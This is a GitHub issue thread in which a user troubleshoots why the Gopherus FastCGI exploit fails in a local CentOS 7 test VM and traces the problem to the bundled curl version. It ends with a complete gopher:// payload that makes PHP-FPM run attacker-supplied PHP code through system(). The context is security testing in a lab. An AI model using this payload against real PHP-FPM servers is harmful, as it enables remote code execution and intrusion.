Join GitHub today
GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.Sign up
fastcgi exploit not executing successfully - CentOS 7 #5
I've been testing the fastcgi exploit in a local VM but unable to get it to to work.
PHP-FPM is listening on port 9000
I've generated the payload an executed as follows
curl just hangs until I eventually send it a SIGINT.
Any help would be much appreciated.
I used tcpdump to capture the activity with the curl and compared it to a tcpdump when accessing a webpage in Wireshark. It seems the packets are not being considered properly formed fastcgi. On the page that's working the 4th packet shows in Wireshark as "FCGI_BEGIN_REQUEST", however when sending the payload generated here it says "TCP segment of a reassembled PDU"
Telnet connects fine.
I'm thinking it may actually be an issue with the cURL version I'm using. I looked at the tcp packet in Wireshark more closely and found that it only contains the 01 01 in the FCGI_BEGIN_REQUEST and then gets cut off (you'll notice the length is 68 of the curl that isn't working whereas it's 82 when I have the request get delivered via Apache mod_proxy_fcgi). It seems like curl is not delivering the TCP packets to fastcgi as expected.
Out of curiosity, which Linux distro / curl version are you testing.
Here are the specs of where I'm testing:
Payload worked on my Mac, so definitely seems to be an issue with the CentOS environment I was testing in / version of cURL.
I've changed the title of the issue to note that it seems to be specific to CentOS (7) and curl that comes with CentOS 7. Not sure if you want to keep this issue open or not?
It works after upgrading curl with these instructions:
[vagrant@localhost Gopherus]$ curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00 --output -
File not found.